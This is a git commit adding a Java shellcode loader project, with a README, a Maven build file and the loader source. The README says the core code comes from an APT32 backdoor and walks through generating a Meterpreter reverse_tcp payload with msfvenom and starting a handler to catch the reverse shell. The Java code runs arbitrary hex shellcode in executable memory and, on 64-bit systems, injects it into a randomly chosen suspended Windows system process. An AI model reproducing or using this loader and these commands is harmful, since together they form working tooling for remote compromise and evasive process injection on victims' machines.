init

yzddmr6 · yzddmr6 · commit 33512a23caca · 2021-05-06T11:17:30.000+08:00
diff --git a/README.md b/README.md
@@ -0,0 +1,55 @@
+## Java ShellCode Loader
+
+基于Java实现的ShellCode加载器，兼容32位及64位平台。
+
+核心代码来源于：[JEShell: An OceanLotus (APT32) Backdoor](https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/)
+
+运行环境：Jre >= 1.5
+
+## 编译
+
+```
+mvn package -DskipTests
+```
+
+## 使用
+
+```
+java -jar ShellcodeLoader.jar shellcode_hex
+```
+
+## 举例
+
+### kali
+
+生成hex格式的ShellCode
+
+```
+┌──(root💀kali)-[~]
+└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.10 LPORT=4444 -f hex
+[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
+[-] No arch selected, selecting arch: x86 from the payload
+No encoder specified, outputting raw payload
+Payload size: 354 bytes
+Final size of hex file: 708 bytes
+fce88f0000006089e531d2648b5xxxx
+```
+
+然后开启监听
+
+```
+msfconsole
+use exploit/multi/handler
+set PAYLOAD windows/meterpreter/reverse_tcp
+set LHOST 192.168.88.10
+set LPORT 4444
+exploit -j
+```
+
+### 客户端
+
+```
+java -jar ShellcodeLoader.jar fce88f0000006089e531d2648b5xxxx
+```
+
+即可收到反弹的Meterpreter
diff --git a/pom.xml b/pom.xml
@@ -0,0 +1,74 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>com.yzddmr6</groupId>
+    <artifactId>ShellcodeLoader</artifactId>
+    <version>1.0-SNAPSHOT</version>
+
+    <name>com.yzddmr6.ShellcodeLoader</name>
+    <url>http://www.example.com</url>
+
+    <properties>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+        <maven.compiler.source>1.5</maven.compiler.source>
+        <maven.compiler.target>1.5</maven.compiler.target>
+    </properties>
+
+    <dependencies>
+        <dependency>
+            <groupId>net.java.dev.jna</groupId>
+            <artifactId>jna-platform</artifactId>
+            <version>5.5.0</version>
+        </dependency>
+    </dependencies>
+
+    <build>
+        <plugins>
+            <!-- clean lifecycle, see https://maven.apache.org/ref/current/maven-core/lifecycles.html#clean_Lifecycle -->
+            <plugin>
+                <artifactId>maven-clean-plugin</artifactId>
+                <version>3.1.0</version>
+            </plugin>
+            <!-- default lifecycle, jar packaging: see https://maven.apache.org/ref/current/maven-core/default-bindings.html#Plugin_bindings_for_jar_packaging -->
+            <plugin>
+                <artifactId>maven-resources-plugin</artifactId>
+                <version>3.0.2</version>
+            </plugin>
+            <plugin>
+                <artifactId>maven-compiler-plugin</artifactId>
+                <version>3.8.0</version>
+            </plugin>
+            <plugin>
+                <artifactId>maven-surefire-plugin</artifactId>
+                <version>2.22.1</version>
+            </plugin>
+
+            <plugin>
+                <artifactId>maven-assembly-plugin</artifactId>
+                <configuration>
+                    <archive>
+                        <manifest>
+                            <mainClass>com.yzddmr6.ShellcodeLoader</mainClass>
+                        </manifest>
+                    </archive>
+                    <descriptorRefs>
+                        <descriptorRef>jar-with-dependencies</descriptorRef>
+                    </descriptorRefs>
+                </configuration>
+                <executions>
+                    <execution>
+                        <id>make-assemble</id>
+                        <phase>package</phase>
+                        <goals>
+                            <goal>single</goal>
+                        </goals>
+                    </execution>
+                </executions>
+            </plugin>
+
+        </plugins>
+    </build>
+</project>
diff --git a/src/main/java/com/yzddmr6/ShellcodeLoader.java b/src/main/java/com/yzddmr6/ShellcodeLoader.java
@@ -0,0 +1,101 @@
+package com.yzddmr6;
+
+import com.sun.jna.Memory;
+import com.sun.jna.Native;
+import com.sun.jna.Pointer;
+import com.sun.jna.platform.win32.Kernel32;
+import com.sun.jna.platform.win32.WinBase;
+import com.sun.jna.platform.win32.WinDef;
+import com.sun.jna.platform.win32.WinNT.HANDLE;
+import com.sun.jna.ptr.IntByReference;
+import com.sun.jna.win32.StdCallLibrary;
+import com.sun.jna.win32.W32APIOptions;
+
+import java.util.Random;
+
+public class ShellcodeLoader {
+    static Kernel32 kernel32;
+    static IKernel32 iKernel32;
+    public static String[] ProcessArray = {"C:\\Windows\\SysWOW64\\ARP.exe", "C:\\Windows\\SysWOW64\\at.exe", "C:\\Windows\\SysWOW64\\auditpol.exe", "C:\\Windows\\SysWOW64\\bitsadmin.exe", "C:\\Windows\\SysWOW64\\bootcfg.exe", "C:\\Windows\\SysWOW64\\ByteCodeGenerator.exe", "C:\\Windows\\SysWOW64\\cacls.exe", "C:\\Windows\\SysWOW64\\chcp.com", "C:\\Windows\\SysWOW64\\CheckNetIsolation.exe", "C:\\Windows\\SysWOW64\\chkdsk.exe", "C:\\Windows\\SysWOW64\\choice.exe", "C:\\Windows\\SysWOW64\\cmdkey.exe", "C:\\Windows\\SysWOW64\\comp.exe", "C:\\Windows\\SysWOW64\\diskcomp.com", "C:\\Windows\\SysWOW64\\Dism.exe", "C:\\Windows\\SysWOW64\\esentutl.exe", "C:\\Windows\\SysWOW64\\expand.exe", "C:\\Windows\\SysWOW64\\fc.exe", "C:\\Windows\\SysWOW64\\find.exe", "C:\\Windows\\SysWOW64\\gpresult.exe"};
+
+    static {
+        kernel32 = Native.loadLibrary(Kernel32.class, W32APIOptions.UNICODE_OPTIONS);
+        iKernel32 = Native.loadLibrary("kernel32", IKernel32.class);
+    }
+
+
+    public static void main(String[] args) {
+        ShellcodeLoader jnaLoader = new ShellcodeLoader();
+        String shellcode = args[0];
+        System.out.println("\nShellcode: \n" + shellcode);
+        jnaLoader.loadShellCode(shellcode);
+    }
+
+    public void loadShellCode(String shellcodeHex) {
+        byte[] shellcode = hexStrToByteArray(shellcodeHex);
+        int shellcodeSize = shellcode.length;
+        IntByReference intByReference = new IntByReference(0);
+        Memory memory = new Memory((long) shellcodeSize);
+
+        int j;
+        for (j = 0; j < shellcodeSize; ++j) {
+            memory.setByte((long) j, shellcode[j]);
+        }
+
+        if (System.getProperty("sun.arch.data.model").equals("32")) {
+            Pointer pointer = iKernel32.VirtualAlloc(Pointer.createConstant(0), shellcodeSize, 4096, 64);
+            kernel32.WriteProcessMemory(kernel32.GetCurrentProcess(), pointer, memory, shellcodeSize, intByReference);
+            HANDLE hANDLE = iKernel32.CreateThread((Object) null, 0, pointer, 0, 0, (Object) null);
+            kernel32.WaitForSingleObject(hANDLE, -1);
+        } else {
+            j = ProcessArray.length;
+            byte b = 0;
+            Random random = new Random();
+            int k = b + random.nextInt(j);
+            WinBase.PROCESS_INFORMATION pROCESS_INFORMATION = new WinBase.PROCESS_INFORMATION();
+            WinBase.STARTUPINFO sTARTUPINFO = new WinBase.STARTUPINFO();
+            sTARTUPINFO.cb = new WinDef.DWORD((long) pROCESS_INFORMATION.size());
+            if (kernel32.CreateProcess(ProcessArray[k], (String) null, (WinBase.SECURITY_ATTRIBUTES) null, (WinBase.SECURITY_ATTRIBUTES) null, false, new WinDef.DWORD(4L), (Pointer) null, (String) null, sTARTUPINFO, pROCESS_INFORMATION)) {
+                Pointer pointer = iKernel32.VirtualAllocEx(pROCESS_INFORMATION.hProcess, Pointer.createConstant(0), shellcodeSize, 4096, 64);
+                kernel32.WriteProcessMemory(pROCESS_INFORMATION.hProcess, pointer, memory, shellcodeSize, intByReference);
+                HANDLE hANDLE = iKernel32.CreateRemoteThread(pROCESS_INFORMATION.hProcess, (Object) null, 0, pointer, 0, 0, (Object) null);
+                kernel32.WaitForSingleObject(hANDLE, -1);
+            }
+        }
+    }
+
+    public static byte[] hexStrToByteArray(String str) {
+        if (str == null) {
+            return null;
+        } else if (str.length() == 0) {
+            return new byte[0];
+        } else {
+            byte[] byteArray = new byte[str.length() / 2];
+
+            for (int i = 0; i < byteArray.length; ++i) {
+                String subStr = str.substring(2 * i, 2 * i + 2);
+                byteArray[i] = (byte) Integer.parseInt(subStr, 16);
+            }
+
+            return byteArray;
+        }
+    }
+
+    interface IKernel32 extends StdCallLibrary {
+        Pointer VirtualAlloc(Pointer var1, int var2, int var3, int var4);
+
+        HANDLE CreateThread(Object var1, int var2, Pointer var3, int var4, int var5, Object var6);
+
+        Pointer VirtualAllocEx(HANDLE var1, Pointer var2, int var3, int var4, int var5);
+
+        HANDLE CreateRemoteThread(HANDLE var1, Object var2, int var3, Pointer var4, int var5, int var6, Object var7);
+
+        boolean ReadProcessMemory(Pointer var1, int var2, Pointer var3, int var4, IntByReference var5);
+
+        int VirtualQueryEx(Pointer var1, Pointer var2, Pointer var3, int var4);
+
+        Pointer OpenProcess(int var1, boolean var2, int var3);
+
+        Pointer GetCurrentProcess();
+    }
+}
